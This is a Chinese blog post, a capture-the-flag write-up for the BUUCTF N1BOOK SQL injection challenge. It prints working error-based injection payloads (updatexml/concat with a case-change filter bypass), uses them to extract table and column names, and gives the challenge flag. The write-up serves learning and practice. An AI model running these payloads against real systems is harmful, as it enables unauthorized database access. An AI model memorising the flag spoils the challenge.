BUUCTF-N1BOOK-Web-SQL注入-2

最新推荐文章于 2024-07-03 07:04:23 发布
最新推荐文章于 2024-07-03 07:04:23 发布
阅读量482 收藏 1
点赞数
分类专栏: BUUCTF-N1BOOK 文章标签: sql php 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47154926/article/details/120653674
版权

在这里插入图片描述打开出现以下界面
在这里插入图片描述
根据题目提示访问login.php
在这里插入图片描述
先查看源代码,看能不能发现一些有用的信息
在这里插入图片描述
提示为报错注入,关于报错注入
根据提示打开burp,在burp里进行注入

1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#

updatexml的第二个参数需要Xpath格式的字符串,以~开头(即0x7e)的内容不是xml格式的语法(这时sql会进行报错),concat()函数用来连接字符串,这里连接函数不符合规则,sql会进行报错,但是 select group_concat(table_name) from information_schema.tables where table_schema=database()
是会先进行执行,将执行结果显示在报错的信息里,这样我们就得到了table_name在这里插入图片描述
根据报错提示:near 'from information_schema.tables where table_schema=database()),0x7e),1)#
在此附近的语法错误,但是语法并没有错误,应该是某个字符串被过滤,猜测select被过滤,将其中某个字母改成大写
在这里插入图片描述
猜测正确,得到表名
接下来查列名

1'and updatexml(1,concat(0x7e,(seLect group_concat(column_name) from information_schema.columns where table_name='fl4g'),0x7e),1)#

在这里插入图片描述
得到列名flag
最后查字段内容

1'and updatexml(1,concat(0x7e,(seLect group_concat(flag) from fl4g),0x7e),1)#

在这里插入图片描述
得到flag:
n1book{login_sqli_is_nice}

Yuntsy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
KFR-26W-BP3N1-L1813
05-27
标题中的“KFR-26W-BP3N1-L1813”是一个特定的空调型号,通常代表了该产品的制造商、系列、功率、功能等信息。在空调行业中,这种型号编码通常遵循一定的规则,便于制造商管理和消费者识别。在这个型号中,“KFR”...
研华UNO-220-P4N1AE套件资料
04-19
研华UNO-220-P4N1AE是一款由研华科技推出的嵌入式工控机套件,主要用于工业自动化、物联网应用等场景。该套件提供的资料丰富,包括了驱动程序、用户指南和硬件规格说明,为开发者提供全方位的支持。 首先,驱动安装...
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2
weixin_40872714的博客
03-28 892
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2 查看html代码,看到有一个提示,说明是要我们报错注入 先抓包,加了tips=1后就会有报错的信息 首先报数据库 note 尝试报表名,出错了,根据错误信息,可能是前面的select被过滤了,这里就是不断尝试,没有什么好的方法 使用双写绕过 获得了关键的fl4g表,flag应该就在这里面 尝试报字段名得到flag字段 直接得到flag ...
BUUCTF[第一章 web入门]SQL注入-2
hivjianxian的博客
11-22 491
ctf题解
BUUCTF [第一章 web入门]SQL注入-2
qq_45707441的博客
12-22 2524
经分析后可知:当输入admin’ and 1=3# 时返回为假 {“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"} 当输入admin’ and 1=1# 时返回为真{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"} 根据返回的字符串,我们可以写出解决的python脚本 #数据库名字长度 import string import requests url="http://e2cc3e..
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
weixin_66146598的博客
06-09 4968
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析),《从0到1:CTFer成长之路》书籍配套题目之sql注入。1、有的网站会开启错误调试信息方便开发者调试,可以利用报错信息进行报错注入2、updatexml第二个参数应为合法XPATH路径,否则会在引发报错的同时输出传入的参数3、dual用于测试数据库是否可以正常使用4、如果没有报错提示,可以bool注入...
SQL注入buuctf web入门sql注入2)
weixin_44214568的博客
07-13 1899
1.启动靶机: 2.进入login.php界面 ps:界面没有注入口,因为这个题目是sql注入,尝试输入常规的login界面,进入了login界面 我们学习ctf,在基础阶段还是要抛开脑洞,掌握并且形成一套破解模式 3.查看源代码 这个源代码里面有用的信息就是?tips=1,但是加到url后面也没什么效果 4.抓包吧 尝试了一下普通的注入没有啥用 5.先用burpsuit查看数据库 注入语句 1' and updatexml(1,concat(0x7e,(select data
[第一章 web入门]SQL注入-2
qq_43618536的博客
07-24 759
[第一章 web入门]SQL注入-2
BUUCTF SQL注入大合集
fly夏天的博客
06-02 2705
SQL水平太菜了,因此专门复现一轮SQL注入再学习一下。 1.强网杯2019随便注 尝试 1 'and '1'='1 成功回显,存在注入点。 但是题目有很强的过滤。 考虑堆叠注入。 由于没有过滤show函数因此可以用其来进行查询一些数据库信息。常见的有 show databases //查询数据库名称 show tables / show tables from db_name //查询(指定数据库)表名 show engines...
DJI FCC for RC-N1 with Chinese.apk中文
06-02
DJI FCC for RC-N1 with Chinese.apk
N1-K1
04-02
介绍了关于N1-K1的详细说明,提供其它知识的技术资料的下载。
N1-install:在Phicomm N1上安装Archlinux
04-09
以下操作都是直接在 N1 上进行 所需资源 分区 挂载 u-boot 安装 userspace 安装 kernel 基本设置 克隆到 mmc 所需资源 1个 N1, 自带 armbian 或者 任意其他的 aarch64 linux 系统 4GB 以上的 U盘 网络 分区 这里暂时...
buu(sql注入)
qq_62046696的博客
08-23 1202
打开界面,我们发现是 admin账号还是monster,这道题肯定与cookie有关,直接在cookie中。列数不对,or也被过滤,大小写,双写都不能绕过,呃呃呃,这样order,information都被过滤了。回显位置,2,3现在我们需要找一个命令替换掉,information.schema_tables,这应该是注入点的位置, 发现# --+被过滤,然后是上传发现,没空格,那就有/**/代替空格。啥都没有,考察cookie用admin登录,都不需要密码,感觉挺离谱的,直接出来试一下monster,..
BUUCTF - Web -[web入门]sql 1~2(水题勿览)
1tachi的博客
12-01 1723
《CTFer:从0到1》的两道sql注入(水题勿览) 看到提示,得到闭合方式:' 查字段数 order by 3正常回显,order by 4无回显,三个字段 判断回显点 回显点是2、3 注意:当id=3的时候会正常回显,这时会覆盖掉我们查询的数据,所以id=3.1,使正常内容不会显,我们就看到了我们所查询的数据 查表名 ?id=3.1' union select 1,table_name,3 from information
CTF刷题记录Buuctf-N1BOOK-sql2
m_de_g的博客
06-09 1176
N1BOOK-SQL2 一、解题思路 直接访问,会出现403,难受,再看一下提示:请访问/login.php /user.php http://7496c5f0-0623-4702-951f-b085e8f8cb97.node3.buuoj.cn/user.php http://7496c5f0-0623-4702-951f-b085e8f8cb97.node3.buuoj.cn/login.php 1.养成好习惯,Ctrl + U 查看页面源代码 2.看到提示,那直接按照提示,走一波 3..
刷题日记2(buuctf web题)
Aurora_lili的博客
04-25 197
单纯的url/flag.php得不到任何东西,查看wp,解释如下:这里它利用了filter伪协议,该协议刚好就能够查看文件包含的漏洞,所以当我们利用该协议查看flag.php时,会将它的源代码爆出来,但是因为base64的加密原因,所以我们还需要进行一次base64解密。5.0版本以上,varchar(100),指的是100字符,无论存放的是数字、字母还是UTF8汉字(每个汉字3字节),都可以存放100个。接着用改名字的方式获取flag,因为flag在1919的表中,所以我们最后要查询的是1919的表,
BUUCTF 2
qq_52431855的博客
01-15 163
知识点: SQL堆叠注入:在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。 show 在过滤了 select 和 where 的情况下,还可以使用 show 来爆出数据库名,表名,和列名。 show datebases; //数据库。 show tables; //表名。 show columns from table; //字段。 alert 作用:修改已知表的列。( 添加:ad
N1_book SQL注入-2(报错注入)
hxhabcd123的博客
08-29 1102
本题使用了burpsuite工具进行抓包和改包,所以借助本题记录该工具抓包和改包的基本使用
LeetCode //SQL - 196. Delete Duplicate Emails
最新发布
Made in Code
07-03 962
【代码】LeetCode //SQL - 196. Delete Duplicate Emails。
buuctf N1book
09-03
根据引用和引用的内容,"buuctf N1book"是一个flag,可以通过使用sqlmap来查看。首先,可以尝试使用sqlmap注入的方式来获取flag。根据引用[3]的内容,需要传入参数tip=1并抓包保存为post.txt文件。然后,使用命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值